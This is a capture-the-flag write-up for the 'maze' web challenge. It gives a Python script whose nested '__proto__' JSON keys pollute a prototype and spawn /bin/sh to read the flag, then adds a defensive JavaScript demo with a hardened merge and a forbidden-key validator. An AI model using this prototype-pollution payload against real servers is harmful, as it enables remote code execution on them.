maze: JS prototype chain pollution

hopeinhand 2023-11-27 15:56:31


import requests
import json
import os

# Target host and port, overridable through the environment
HOST = os.getenv("HOST", "82.157.146.43")
PORT = os.getenv("PORT", "16154")

# JavaScript string that ends up in the polluted "heap" property; newlines are
# stripped so the whole snippet sits on one line inside the JSON value below
js = """
var p = process.binding('process_wrap').Process;
var proc = new p();
proc.spawn({
  file: '/bin/sh',
  args: ['/bin/sh', '-c', '/bin/cat /flag*'],
  cwd: '/',
  stdio: [process.stdin, process.stdout, process.stderr]
});
""".replace("\n", "")

# Maze body: the nested "__proto__" keys under "start" carry the prototype-pollution
# payload, setting "heap" on a shared prototype; "goal" is a tuple, which
# json.dumps serialises as the JSON array [1, 1]
maze = {
    "map": [[0, 0], [0, 0]],
    "start": {
        "0": 0, "1": 0,
        "__proto__": {
            "__proto__": {
                "heap": "BinaryHeap(), function(){" + js + "}();//"
            }
        }
    },
    "goal": (1, 1),
    "heap": None
}

# Send the maze as JSON to the challenge's /solve endpoint and print the response
r = requests.post(f"http://{HOST}:{PORT}/solve",
                  headers={"Content-Type": "application/json"},
                  data=json.dumps(maze))
print(r.text)


Change HOST and PORT to the values for your environment and run the script; the flag is:

KosenCTF{fr0m_Array_prototype_pollution_t0_RCE}
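As an added illustration from the defensive side (this is not code from the writeup or from the challenge, whose server code is not shown on this page), the block below demonstrates the pattern that makes a `__proto__` key in parsed JSON dangerous, beside two mitigations: a merge that refuses prototype-related keys, and a request validator that reports where such keys sit in an incoming body. The function names `unsafeMerge`, `safeMerge` and `findForbiddenKeys`, the `POLLUTING_BODY` string and the `SAMPLE_REQUEST` object are all constructed for this example; `SAMPLE_REQUEST` mirrors the shape of the writeup's maze body but carries a harmless `polluted` key instead of `heap`, and the challenge's `BinaryHeap` logic is not modelled.

```javascript
// Added example: prototype pollution through a recursive merge, and two defences.
// Nothing here is from the challenge; all key names and sample bodies are constructed.

const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);
const isPlainObject = (v) => v !== null && typeof v === 'object' && !Array.isArray(v);

// Vulnerable: for...in plus bracket access. JSON.parse creates an OWN property named
// "__proto__", so source[key] yields the attacker-controlled object, while target[key]
// on a target without such an own property hits the accessor and returns Object.prototype.
function unsafeMerge(target, source) {
  for (const key in source) {
    const value = source[key];
    if (value !== null && typeof value === 'object') {
      if (target[key] === null || typeof target[key] !== 'object') target[key] = {};
      unsafeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened: own keys only, prototype-related names refused, and a nested target
// is reused only when it is an own plain object of the target.
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    const value = source[key];
    if (isPlainObject(value)) {
      if (!hasOwn(target, key) || !isPlainObject(target[key])) target[key] = {};
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Validator for request bodies: returns JSON-path style locations of forbidden keys,
// so a handler can reject (and log) the request before any merge or assignment runs.
function findForbiddenKeys(value, path = '$') {
  const hits = [];
  if (Array.isArray(value)) {
    value.forEach((item, i) => hits.push(...findForbiddenKeys(item, `${path}[${i}]`)));
  } else if (isPlainObject(value)) {
    for (const key of Object.keys(value)) {
      const here = `${path}.${key}`;
      if (FORBIDDEN_KEYS.has(key)) hits.push(here);
      hits.push(...findForbiddenKeys(value[key], here));
    }
  }
  return hits;
}

// Constructed single-level payload with a harmless key, used by both merge demos.
const POLLUTING_BODY = '{"a": 1, "__proto__": {"polluted": "yes"}}';

// Runs the vulnerable merge, reports whether a fresh object now inherits the key,
// then removes the polluted property so the rest of the process is unaffected.
function pollutionDemo() {
  unsafeMerge({}, JSON.parse(POLLUTING_BODY));
  const leaked = ({}).polluted;        // "yes" means Object.prototype was modified
  delete Object.prototype.polluted;
  return leaked;
}

// Same body through the hardened merge: nothing leaks and only "a" is copied.
function hardenedDemo() {
  const merged = safeMerge({}, JSON.parse(POLLUTING_BODY));
  return { leaked: ({}).polluted, merged };
}

// Constructed request shaped like the writeup's maze body, with a harmless inner key.
const SAMPLE_REQUEST = JSON.parse(
  '{"map": [[0, 0], [0, 0]],' +
  ' "start": {"0": 0, "1": 0, "__proto__": {"__proto__": {"polluted": "yes"}}},' +
  ' "goal": [1, 1]}'
);

if (typeof require !== 'undefined' && require.main === module) {
  console.log('unsafe merge leaked:', pollutionDemo());
  const h = hardenedDemo();
  console.log('safe merge leaked:', h.leaked, 'merged:', h.merged);
  console.log('forbidden keys in sample request:', findForbiddenKeys(SAMPLE_REQUEST));
}
```

Running it prints `yes` for the unsafe merge, `undefined` for the hardened one, and `['$.start.__proto__', '$.start.__proto__.__proto__']` for the sample request, which is exactly the nesting the writeup's payload uses. A validator like `findForbiddenKeys` in front of the JSON body parser gives a cheap detection point: any hit is worth logging with the source address, since legitimate maze input has no reason to carry those keys.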

Category: WEB

Comments

whiteHaves, 3 months ago:

Respect: an expert solved it and the writeup doesn't even cost gold coins. Upvoted, even though I can't follow the writeup.
